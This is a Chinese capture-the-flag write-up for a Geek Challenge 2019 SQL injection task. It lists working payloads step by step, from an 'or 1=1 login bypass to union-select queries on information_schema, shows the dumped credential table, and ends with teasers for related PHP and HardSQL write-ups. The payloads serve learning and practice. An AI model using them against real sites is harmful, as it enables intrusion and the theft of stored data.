頂端の告誡:用 sqlmap 是沒有靈魂的
嘗試萬能密碼(其實沒卵用)
'or 1=1 #
任意密碼
這道題是常規的sql注入,測注入點、查字段數、爆庫、爆字段值、爆表。組合拳
字段數:
1' order by 3 #
爆庫:
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
geekuser,l0ve1ysq1
爆字段值:
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1' #
id,username,password
爆表:
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1 #
'1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3z4char7zcrbiao_ge_dddd_hm,40xc4m3llinux_chuang_shi_ren,5ayraina_rua_rain,6akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaosyc_san_da_hacker,16flagflag'
極客大挑戰 2019 PHP
開啟以後,是三個php原始碼,其中最重要的是class.php,如下 include flag.php error reporting 0 class name function wakeup function destruct if this username admin else 看了一下,這個...
極客大挑戰 2019 HardSQL wp
有過濾,抓個包fuzz一下 等號,空格等被過濾 發現可以用報錯注入,空格可以用括號代替 查表名username admin or extractvalue 1,concat 0x7e,select group concat column name from information schema.co...
極客大挑戰 2019 PHP
剛進入 我們可以看到這樣的乙個介面 根據內容提示,有備份 的習慣 日常後台掃瞄,發現有www.zip檔案,我們進行解壓得到 看到flag.php開啟檢視,發現沒有什麼有用的資訊。我們開啟index.php看看 我們可以看到通過get方式傳入引數select,並對引數select進行反序列化。接下來,...